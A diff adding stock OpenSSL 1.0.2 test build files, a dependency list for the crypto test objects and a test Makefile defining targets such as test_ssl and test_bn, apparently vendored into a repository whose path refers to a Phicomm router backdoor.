+bftest.o: ../include/openssl/opensslconf.h bftest.c
+bntest.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+bntest.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+bntest.o: ../include/openssl/crypto.h ../include/openssl/dh.h
+bntest.o: ../include/openssl/dsa.h ../include/openssl/e_os2.h
+bntest.o: ../include/openssl/err.h ../include/openssl/evp.h
+bntest.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+bntest.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+bntest.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+bntest.o: ../include/openssl/pkcs7.h ../include/openssl/rand.h
+bntest.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+bntest.o: ../include/openssl/sha.h ../include/openssl/stack.h
+bntest.o: ../include/openssl/symhacks.h ../include/openssl/x509.h
+bntest.o: ../include/openssl/x509_vfy.h bntest.c
+casttest.o: ../e_os.h ../include/openssl/cast.h ../include/openssl/e_os2.h
+casttest.o: ../include/openssl/opensslconf.h casttest.c
+constant_time_test.o: ../crypto/constant_time_locl.h ../e_os.h
+constant_time_test.o: ../include/openssl/e_os2.h
+constant_time_test.o: ../include/openssl/opensslconf.h constant_time_test.c
+destest.o: ../include/openssl/crypto.h ../include/openssl/des.h
+destest.o: ../include/openssl/des_old.h ../include/openssl/e_os2.h
+destest.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+destest.o: ../include/openssl/ossl_typ.h ../include/openssl/safestack.h
+destest.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+destest.o: ../include/openssl/ui.h ../include/openssl/ui_compat.h destest.c
+dhtest.o: ../e_os.h ../include/openssl/bio.h ../include/openssl/bn.h
+dhtest.o: ../include/openssl/crypto.h ../include/openssl/dh.h
+dhtest.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+dhtest.o: ../include/openssl/lhash.h ../include/openssl/opensslconf.h
+dhtest.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+dhtest.o: ../include/openssl/rand.h ../include/openssl/safestack.h
+dhtest.o: ../include/openssl/stack.h ../include/openssl/symhacks.h dhtest.c
+dsatest.o: ../e_os.h ../include/openssl/bio.h ../include/openssl/bn.h
+dsatest.o: ../include/openssl/crypto.h ../include/openssl/dh.h
+dsatest.o: ../include/openssl/dsa.h ../include/openssl/e_os2.h
+dsatest.o: ../include/openssl/err.h ../include/openssl/lhash.h
+dsatest.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+dsatest.o: ../include/openssl/ossl_typ.h ../include/openssl/rand.h
+dsatest.o: ../include/openssl/safestack.h ../include/openssl/stack.h
+dsatest.o: ../include/openssl/symhacks.h dsatest.c
+ecdhtest.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+ecdhtest.o: ../include/openssl/bn.h ../include/openssl/crypto.h
+ecdhtest.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+ecdhtest.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+ecdhtest.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+ecdhtest.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+ecdhtest.o: ../include/openssl/rand.h ../include/openssl/safestack.h
+ecdhtest.o: ../include/openssl/sha.h ../include/openssl/stack.h
+ecdhtest.o: ../include/openssl/symhacks.h ecdhtest.c
+ecdsatest.o: ../include/openssl/opensslconf.h ecdsatest.c
+ectest.o: ../e_os.h ../include/openssl/e_os2.h ../include/openssl/opensslconf.h
+ectest.o: ectest.c
+enginetest.o: ../include/openssl/e_os2.h ../include/openssl/opensslconf.h
+enginetest.o: enginetest.c
+evp_test.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+evp_test.o: ../include/openssl/bn.h ../include/openssl/conf.h
+evp_test.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+evp_test.o: ../include/openssl/err.h ../include/openssl/evp.h
+evp_test.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+evp_test.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+evp_test.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+evp_test.o: ../include/openssl/safestack.h ../include/openssl/stack.h
+evp_test.o: ../include/openssl/symhacks.h evp_test.c
+exptest.o: ../e_os.h ../include/openssl/bio.h ../include/openssl/bn.h
+exptest.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+exptest.o: ../include/openssl/err.h ../include/openssl/lhash.h
+exptest.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+exptest.o: ../include/openssl/ossl_typ.h ../include/openssl/rand.h
+exptest.o: ../include/openssl/safestack.h ../include/openssl/stack.h
+exptest.o: ../include/openssl/symhacks.h exptest.c
+heartbeat_test.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+heartbeat_test.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+heartbeat_test.o: ../include/openssl/crypto.h ../include/openssl/dh.h
+heartbeat_test.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+heartbeat_test.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+heartbeat_test.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+heartbeat_test.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+heartbeat_test.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+heartbeat_test.o: ../include/openssl/opensslconf.h
+heartbeat_test.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+heartbeat_test.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+heartbeat_test.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+heartbeat_test.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+heartbeat_test.o: ../include/openssl/sha.h ../include/openssl/srtp.h
+heartbeat_test.o: ../include/openssl/ssl.h ../include/openssl/ssl2.h
+heartbeat_test.o: ../include/openssl/ssl23.h ../include/openssl/ssl3.h
+heartbeat_test.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+heartbeat_test.o: ../include/openssl/tls1.h ../include/openssl/x509.h
+heartbeat_test.o: ../include/openssl/x509_vfy.h ../ssl/ssl_locl.h
+heartbeat_test.o: ../test/testutil.h heartbeat_test.c
+hmactest.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+hmactest.o: ../include/openssl/bn.h ../include/openssl/crypto.h
+hmactest.o: ../include/openssl/e_os2.h ../include/openssl/evp.h
+hmactest.o: ../include/openssl/hmac.h ../include/openssl/md5.h
+hmactest.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+hmactest.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+hmactest.o: ../include/openssl/ossl_typ.h ../include/openssl/safestack.h
+hmactest.o: ../include/openssl/stack.h ../include/openssl/symhacks.h hmactest.c
+ideatest.o: ../e_os.h ../include/openssl/e_os2.h
+ideatest.o: ../include/openssl/opensslconf.h ideatest.c
+igetest.o: ../include/openssl/aes.h ../include/openssl/e_os2.h
+igetest.o: ../include/openssl/opensslconf.h ../include/openssl/ossl_typ.h
+igetest.o: ../include/openssl/rand.h igetest.c
+jpaketest.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+jpaketest.o: ../include/openssl/e_os2.h ../include/openssl/opensslconf.h
+jpaketest.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+jpaketest.o: ../include/openssl/safestack.h ../include/openssl/stack.h
+jpaketest.o: ../include/openssl/symhacks.h jpaketest.c
+md2test.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+md2test.o: ../include/openssl/e_os2.h ../include/openssl/opensslconf.h
+md2test.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+md2test.o: ../include/openssl/safestack.h ../include/openssl/stack.h
+md2test.o: ../include/openssl/symhacks.h md2test.c
+md4test.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+md4test.o: ../include/openssl/bn.h ../include/openssl/crypto.h
+md4test.o: ../include/openssl/e_os2.h ../include/openssl/evp.h
+md4test.o: ../include/openssl/md4.h ../include/openssl/obj_mac.h
+md4test.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+md4test.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+md4test.o: ../include/openssl/safestack.h ../include/openssl/stack.h
+md4test.o: ../include/openssl/symhacks.h md4test.c
+md5test.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+md5test.o: ../include/openssl/bn.h ../include/openssl/crypto.h
+md5test.o: ../include/openssl/e_os2.h ../include/openssl/evp.h
+md5test.o: ../include/openssl/md5.h ../include/openssl/obj_mac.h
+md5test.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+md5test.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+md5test.o: ../include/openssl/safestack.h ../include/openssl/stack.h
+md5test.o: ../include/openssl/symhacks.h md5test.c
+mdc2test.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+mdc2test.o: ../include/openssl/bn.h ../include/openssl/crypto.h
+mdc2test.o: ../include/openssl/des.h ../include/openssl/des_old.h
+mdc2test.o: ../include/openssl/e_os2.h ../include/openssl/evp.h
+mdc2test.o: ../include/openssl/mdc2.h ../include/openssl/obj_mac.h
+mdc2test.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+mdc2test.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+mdc2test.o: ../include/openssl/safestack.h ../include/openssl/stack.h
+mdc2test.o: ../include/openssl/symhacks.h ../include/openssl/ui.h
+mdc2test.o: ../include/openssl/ui_compat.h mdc2test.c
+randtest.o: ../e_os.h ../include/openssl/e_os2.h
+randtest.o: ../include/openssl/opensslconf.h ../include/openssl/ossl_typ.h
+randtest.o: ../include/openssl/rand.h randtest.c
+rc2test.o: ../e_os.h ../include/openssl/e_os2.h
+rc2test.o: ../include/openssl/opensslconf.h ../include/openssl/rc2.h rc2test.c
+rc4test.o: ../e_os.h ../include/openssl/e_os2.h
+rc4test.o: ../include/openssl/opensslconf.h ../include/openssl/rc4.h
+rc4test.o: ../include/openssl/sha.h rc4test.c
+rc5test.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+rc5test.o: ../include/openssl/e_os2.h ../include/openssl/opensslconf.h
+rc5test.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+rc5test.o: ../include/openssl/safestack.h ../include/openssl/stack.h
+rc5test.o: ../include/openssl/symhacks.h rc5test.c
+rmdtest.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+rmdtest.o: ../include/openssl/bn.h ../include/openssl/crypto.h
+rmdtest.o: ../include/openssl/e_os2.h ../include/openssl/evp.h
+rmdtest.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+rmdtest.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+rmdtest.o: ../include/openssl/ossl_typ.h ../include/openssl/ripemd.h
+rmdtest.o: ../include/openssl/safestack.h ../include/openssl/stack.h
+rmdtest.o: ../include/openssl/symhacks.h rmdtest.c
+rsa_test.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+rsa_test.o: ../include/openssl/bn.h ../include/openssl/crypto.h
+rsa_test.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+rsa_test.o: ../include/openssl/lhash.h ../include/openssl/opensslconf.h
+rsa_test.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+rsa_test.o: ../include/openssl/rand.h ../include/openssl/rsa.h
+rsa_test.o: ../include/openssl/safestack.h ../include/openssl/stack.h
+rsa_test.o: ../include/openssl/symhacks.h rsa_test.c
+sha1test.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+sha1test.o: ../include/openssl/bn.h ../include/openssl/crypto.h
+sha1test.o: ../include/openssl/e_os2.h ../include/openssl/evp.h
+sha1test.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+sha1test.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+sha1test.o: ../include/openssl/ossl_typ.h ../include/openssl/safestack.h
+sha1test.o: ../include/openssl/sha.h ../include/openssl/stack.h
+sha1test.o: ../include/openssl/symhacks.h sha1test.c
+shatest.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+shatest.o: ../include/openssl/bn.h ../include/openssl/crypto.h
+shatest.o: ../include/openssl/e_os2.h ../include/openssl/evp.h
+shatest.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+shatest.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+shatest.o: ../include/openssl/ossl_typ.h ../include/openssl/safestack.h
+shatest.o: ../include/openssl/sha.h ../include/openssl/stack.h
+shatest.o: ../include/openssl/symhacks.h shatest.c
+srptest.o: ../include/openssl/opensslconf.h srptest.c
+ssltest.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+ssltest.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+ssltest.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+ssltest.o: ../include/openssl/dh.h ../include/openssl/dsa.h
+ssltest.o: ../include/openssl/dtls1.h ../include/openssl/e_os2.h
+ssltest.o: ../include/openssl/err.h ../include/openssl/evp.h
+ssltest.o: ../include/openssl/hmac.h ../include/openssl/kssl.h
+ssltest.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+ssltest.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+ssltest.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+ssltest.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+ssltest.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+ssltest.o: ../include/openssl/rand.h ../include/openssl/rsa.h
+ssltest.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+ssltest.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+ssltest.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+ssltest.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+ssltest.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+ssltest.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+ssltest.o: ../include/openssl/x509v3.h ssltest.c
+v3nametest.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+v3nametest.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+v3nametest.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+v3nametest.o: ../include/openssl/dh.h ../include/openssl/dsa.h
+v3nametest.o: ../include/openssl/e_os2.h ../include/openssl/evp.h
+v3nametest.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+v3nametest.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+v3nametest.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+v3nametest.o: ../include/openssl/pkcs7.h ../include/openssl/rsa.h
+v3nametest.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+v3nametest.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+v3nametest.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+v3nametest.o: ../include/openssl/x509v3.h v3nametest.c
+wp_test.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+wp_test.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+wp_test.o: ../include/openssl/ossl_typ.h ../include/openssl/safestack.h
+wp_test.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+wp_test.o: ../include/openssl/whrlpool.h wp_test.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/Makefile.save
new file mode 100644
index 0000000..7f67bae
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/Makefile.save
@@ -0,0 +1,764 @@
+#
+# test/Makefile
+#
+
+DIR=		test
+TOP=		..
+CC=		cc
+INCLUDES=	-I$(TOP) -I../include $(KRB5_INCLUDES)
+CFLAG=		-g
+MAKEDEPEND=	$(TOP)/util/domd $(TOP) -MD $(MAKEDEPPROG)
+PERL=		perl
+# KRB5 stuff
+KRB5_INCLUDES=
+LIBKRB5=
+TEST=		igetest.c
+
+PEX_LIBS=
+EX_LIBS= #-lnsl -lsocket
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile maketests.com \
+	tests.com testenc.com tx509.com trsa.com tcrl.com tsid.com treq.com \
+	tpkcs7.com tpkcs7d.com tverify.com testgen.com testss.com testssl.com \
+	testca.com VMSca-response.1 VMSca-response.2
+
+DLIBCRYPTO= ../libcrypto.a
+DLIBSSL= ../libssl.a
+LIBCRYPTO= -L.. -lcrypto
+LIBSSL= -L.. -lssl
+
+BNTEST=		bntest
+ECTEST=		ectest
+ECDSATEST=	ecdsatest
+ECDHTEST=	ecdhtest
+EXPTEST=	exptest
+IDEATEST=	ideatest
+SHATEST=	shatest
+SHA1TEST=	sha1test
+SHA256TEST=	sha256t
+SHA512TEST=	sha512t
+MDC2TEST=	mdc2test
+RMDTEST=	rmdtest
+MD2TEST=	md2test
+MD4TEST=	md4test
+MD5TEST=	md5test
+HMACTEST=	hmactest
+WPTEST=		wp_test
+RC2TEST=	rc2test
+RC4TEST=	rc4test
+RC5TEST=	rc5test
+BFTEST=		bftest
+CASTTEST=	casttest
+DESTEST=	destest
+RANDTEST=	randtest
+DHTEST=		dhtest
+DSATEST=	dsatest
+METHTEST=	methtest
+SSLTEST=	ssltest
+RSATEST=	rsa_test
+ENGINETEST=	enginetest
+EVPTEST=	evp_test
+IGETEST=	igetest
+JPAKETEST=	jpaketest
+SRPTEST=	srptest
+V3NAMETEST=	v3nametest
+ASN1TEST=	asn1test
+HEARTBEATTEST=  heartbeat_test
+CONSTTIMETEST=  constant_time_test
+
+TESTS=		alltests
+
+EXE=	$(BNTEST)$(EXE_EXT) $(ECTEST)$(EXE_EXT)  $(ECDSATEST)$(EXE_EXT) $(ECDHTEST)$(EXE_EXT) $(IDEATEST)$(EXE_EXT) \
+	$(MD2TEST)$(EXE_EXT)  $(MD4TEST)$(EXE_EXT) $(MD5TEST)$(EXE_EXT) $(HMACTEST)$(EXE_EXT) $(WPTEST)$(EXE_EXT) \
+	$(RC2TEST)$(EXE_EXT) $(RC4TEST)$(EXE_EXT) $(RC5TEST)$(EXE_EXT) \
+	$(DESTEST)$(EXE_EXT) $(SHATEST)$(EXE_EXT) $(SHA1TEST)$(EXE_EXT) $(SHA256TEST)$(EXE_EXT) $(SHA512TEST)$(EXE_EXT) \
+	$(MDC2TEST)$(EXE_EXT) $(RMDTEST)$(EXE_EXT) \
+	$(RANDTEST)$(EXE_EXT) $(DHTEST)$(EXE_EXT) $(ENGINETEST)$(EXE_EXT) \
+	$(BFTEST)$(EXE_EXT) $(CASTTEST)$(EXE_EXT) $(SSLTEST)$(EXE_EXT) $(EXPTEST)$(EXE_EXT) $(DSATEST)$(EXE_EXT) $(RSATEST)$(EXE_EXT) \
+	$(EVPTEST)$(EXE_EXT) $(IGETEST)$(EXE_EXT) $(JPAKETEST)$(EXE_EXT) $(SRPTEST)$(EXE_EXT) \
+	$(ASN1TEST)$(EXE_EXT) $(V3NAMETEST)$(EXE_EXT) $(HEARTBEATTEST)$(EXE_EXT) \
+	$(CONSTTIMETEST)$(EXE_EXT)
+
+# $(METHTEST)$(EXE_EXT)
+
+OBJ=	$(BNTEST).o $(ECTEST).o  $(ECDSATEST).o $(ECDHTEST).o $(IDEATEST).o \
+	$(MD2TEST).o $(MD4TEST).o $(MD5TEST).o \
+	$(HMACTEST).o $(WPTEST).o \
+	$(RC2TEST).o $(RC4TEST).o $(RC5TEST).o \
+	$(DESTEST).o $(SHATEST).o $(SHA1TEST).o $(SHA256TEST).o $(SHA512TEST).o \
+	$(MDC2TEST).o $(RMDTEST).o \
+	$(RANDTEST).o $(DHTEST).o $(ENGINETEST).o $(CASTTEST).o \
+	$(BFTEST).o  $(SSLTEST).o  $(DSATEST).o  $(EXPTEST).o $(RSATEST).o \
+	$(EVPTEST).o $(IGETEST).o $(JPAKETEST).o $(ASN1TEST).o $(V3NAMETEST).o \
+	$(HEARTBEATTEST).o $(CONSTTIMETEST).o
+
+SRC=	$(BNTEST).c $(ECTEST).c  $(ECDSATEST).c $(ECDHTEST).c $(IDEATEST).c \
+	$(MD2TEST).c  $(MD4TEST).c $(MD5TEST).c \
+	$(HMACTEST).c $(WPTEST).c \
+	$(RC2TEST).c $(RC4TEST).c $(RC5TEST).c \
+	$(DESTEST).c $(SHATEST).c $(SHA1TEST).c $(MDC2TEST).c $(RMDTEST).c \
+	$(RANDTEST).c $(DHTEST).c $(ENGINETEST).c $(CASTTEST).c \
+	$(BFTEST).c  $(SSLTEST).c $(DSATEST).c   $(EXPTEST).c $(RSATEST).c \
+	$(EVPTEST).c $(IGETEST).c $(JPAKETEST).c $(SRPTEST).c $(ASN1TEST).c \
+	$(V3NAMETEST).c $(HEARTBEATTEST).c $(CONSTTIMETEST).c
+
+EXHEADER= 
+HEADER=	testutil.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ..; $(MAKE) DIRS=$(DIR) TESTS=$(TESTS) all)
+
+all:	exe
+
+exe:	$(EXE) dummytest$(EXE_EXT)
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+
+generate: $(SRC)
+$(SRC):
+	@sh $(TOP)/util/point.sh dummytest.c $@
+
+errors:
+
+install:
+
+tags:
+	ctags $(SRC)
+
+tests:	exe apps $(TESTS)
+
+apps:
+	@(cd ..; $(MAKE) DIRS=apps all)
+
+alltests: \
+	test_des test_idea test_sha test_md4 test_md5 test_hmac \
+	test_md2 test_mdc2 test_wp \
+	test_rmd test_rc2 test_rc4 test_rc5 test_bf test_cast test_aes \
+	test_rand test_bn test_ec test_ecdsa test_ecdh \
+	test_enc test_x509 test_rsa test_crl test_sid \
+	test_gen test_req test_pkcs7 test_verify test_dh test_dsa \
+	test_ss test_ca test_engine test_evp test_ssl test_tsa test_ige \
+	test_jpake test_srp test_cms test_ocsp test_v3name test_heartbeat \
+	test_constant_time
+
+test_evp: $(EVPTEST)$(EXE_EXT) evptests.txt
+	../util/shlib_wrap.sh ./$(EVPTEST) evptests.txt
+
+test_des: $(DESTEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(DESTEST)
+
+test_idea: $(IDEATEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(IDEATEST)
+
+test_sha: $(SHATEST)$(EXE_EXT) $(SHA1TEST)$(EXE_EXT) $(SHA256TEST)$(EXE_EXT) $(SHA512TEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(SHATEST)
+	../util/shlib_wrap.sh ./$(SHA1TEST)
+	../util/shlib_wrap.sh ./$(SHA256TEST)
+	../util/shlib_wrap.sh ./$(SHA512TEST)
+
+test_mdc2: $(MDC2TEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(MDC2TEST)
+
+test_md5: $(MD5TEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(MD5TEST)
+
+test_md4: $(MD4TEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(MD4TEST)
+
+test_hmac: $(HMACTEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(HMACTEST)
+
+test_wp: $(WPTEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(WPTEST)
+
+test_md2: $(MD2TEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(MD2TEST)
+
+test_rmd: $(RMDTEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(RMDTEST)
+
+test_bf: $(BFTEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(BFTEST)
+
+test_cast: $(CASTTEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(CASTTEST)
+
+test_rc2: $(RC2TEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(RC2TEST)
+
+test_rc4: $(RC4TEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(RC4TEST)
+
+test_rc5: $(RC5TEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(RC5TEST)
+
+test_rand: $(RANDTEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(RANDTEST)
+
+test_enc: ../apps/openssl$(EXE_EXT) testenc
+	@sh ./testenc
+
+test_x509: ../apps/openssl$(EXE_EXT) tx509 testx509.pem v3-cert1.pem v3-cert2.pem
+	echo test normal x509v1 certificate
+	sh ./tx509 2>/dev/null
+	echo test first x509v3 certificate
+	sh ./tx509 v3-cert1.pem 2>/dev/null
+	echo test second x509v3 certificate
+	sh ./tx509 v3-cert2.pem 2>/dev/null
+
+test_rsa: $(RSATEST)$(EXE_EXT) ../apps/openssl$(EXE_EXT) trsa testrsa.pem
+	@sh ./trsa 2>/dev/null
+	../util/shlib_wrap.sh ./$(RSATEST)
+
+test_crl: ../apps/openssl$(EXE_EXT) tcrl testcrl.pem
+	@sh ./tcrl 2>/dev/null
+
+test_sid: ../apps/openssl$(EXE_EXT) tsid testsid.pem
+	@sh ./tsid 2>/dev/null
+
+test_req: ../apps/openssl$(EXE_EXT) treq testreq.pem testreq2.pem
+	@sh ./treq 2>/dev/null
+	@sh ./treq testreq2.pem 2>/dev/null
+
+test_pkcs7: ../apps/openssl$(EXE_EXT) tpkcs7 tpkcs7d testp7.pem pkcs7-1.pem
+	@sh ./tpkcs7 2>/dev/null
+	@sh ./tpkcs7d 2>/dev/null
+
+test_bn: $(BNTEST)$(EXE_EXT) $(EXPTEST)$(EXE_EXT) bctest
+	@echo starting big number library test, could take a while...
+	@../util/shlib_wrap.sh ./$(BNTEST) >tmp.bntest
+	@echo quit >>tmp.bntest
+	@echo "running bc"
+	@<tmp.bntest sh -c "`sh ./bctest ignore`" | $(PERL) -e '$$i=0; while (<STDIN>) {if (/^test (.*)/) {print STDERR "\nverify $$1";} elsif (!/^0$$/) {die "\nFailed! bc: $$_";} else {print STDERR "."; $$i++;}} print STDERR "\n$$i tests passed\n"'
+	@echo 'test a^b%c implementations'
+	../util/shlib_wrap.sh ./$(EXPTEST)
+
+test_ec: $(ECTEST)$(EXE_EXT)
+	@echo 'test elliptic curves'
+	../util/shlib_wrap.sh ./$(ECTEST)
+
+test_ecdsa: $(ECDSATEST)$(EXE_EXT)
+	@echo 'test ecdsa'
+	../util/shlib_wrap.sh ./$(ECDSATEST)
+
+test_ecdh: $(ECDHTEST)$(EXE_EXT)
+	@echo 'test ecdh'
+	../util/shlib_wrap.sh ./$(ECDHTEST)
+
+test_verify: ../apps/openssl$(EXE_EXT)
+	@echo "The following command should have some OK's and some failures"
+	@echo "There are definitly a few expired certificates"
+	../util/shlib_wrap.sh ../apps/openssl verify -CApath ../certs/demo ../certs/demo/*.pem
+
+test_dh: $(DHTEST)$(EXE_EXT)
+	@echo "Generate a set of DH parameters"
+	../util/shlib_wrap.sh ./$(DHTEST)
+
+test_dsa: $(DSATEST)$(EXE_EXT)
+	@echo "Generate a set of DSA parameters"
+	../util/shlib_wrap.sh ./$(DSATEST)
+	../util/shlib_wrap.sh ./$(DSATEST) -app2_1
+
+test_gen testreq.pem: ../apps/openssl$(EXE_EXT) testgen test.cnf
+	@echo "Generate and verify a certificate request"
+	@sh ./testgen
+
+test_ss keyU.ss certU.ss certCA.ss certP1.ss keyP1.ss certP2.ss keyP2.ss \
+		intP1.ss intP2.ss: testss CAss.cnf Uss.cnf P1ss.cnf P2ss.cnf \
+                                   ../apps/openssl$(EXE_EXT)
+	@echo "Generate and certify a test certificate"
+	@sh ./testss
+	@cat certCA.ss certU.ss > intP1.ss
+	@cat certCA.ss certU.ss certP1.ss > intP2.ss
+
+test_engine:  $(ENGINETEST)$(EXE_EXT)
+	@echo "Manipulate the ENGINE structures"
+	../util/shlib_wrap.sh ./$(ENGINETEST)
+
+test_ssl: keyU.ss certU.ss certCA.ss certP1.ss keyP1.ss certP2.ss keyP2.ss \
+		intP1.ss intP2.ss $(SSLTEST)$(EXE_EXT) testssl testsslproxy \
+		../apps/server2.pem serverinfo.pem
+	@echo "test SSL protocol"
+	@if [ -n "$(FIPSCANLIB)" ]; then \
+	  sh ./testfipsssl keyU.ss certU.ss certCA.ss; \
+	fi
+	../util/shlib_wrap.sh ./$(SSLTEST) -test_cipherlist
+	@sh ./testssl keyU.ss certU.ss certCA.ss
+	@sh ./testsslproxy keyP1.ss certP1.ss intP1.ss
+	@sh ./testsslproxy keyP2.ss certP2.ss intP2.ss
+
+test_ca: ../apps/openssl$(EXE_EXT) testca CAss.cnf Uss.cnf
+	@if ../util/shlib_wrap.sh ../apps/openssl no-rsa; then \
+	  echo "skipping CA.sh test -- requires RSA"; \
+	else \
+	  echo "Generate and certify a test certificate via the 'ca' program"; \
+	  sh ./testca; \
+	fi
+
+test_aes: #$(AESTEST)
+#	@echo "test Rijndael"
+#	../util/shlib_wrap.sh ./$(AESTEST)
+
+test_tsa: ../apps/openssl$(EXE_EXT) testtsa CAtsa.cnf ../util/shlib_wrap.sh
+	@if ../util/shlib_wrap.sh ../apps/openssl no-rsa; then \
+	  echo "skipping testtsa test -- requires RSA"; \
+	else \
+	  sh ./testtsa; \
+	fi
+
+test_ige: $(IGETEST)$(EXE_EXT)
+	@echo "Test IGE mode"
+	../util/shlib_wrap.sh ./$(IGETEST)
+
+test_jpake: $(JPAKETEST)$(EXE_EXT)
+	@echo "Test JPAKE"
+	../util/shlib_wrap.sh ./$(JPAKETEST)
+
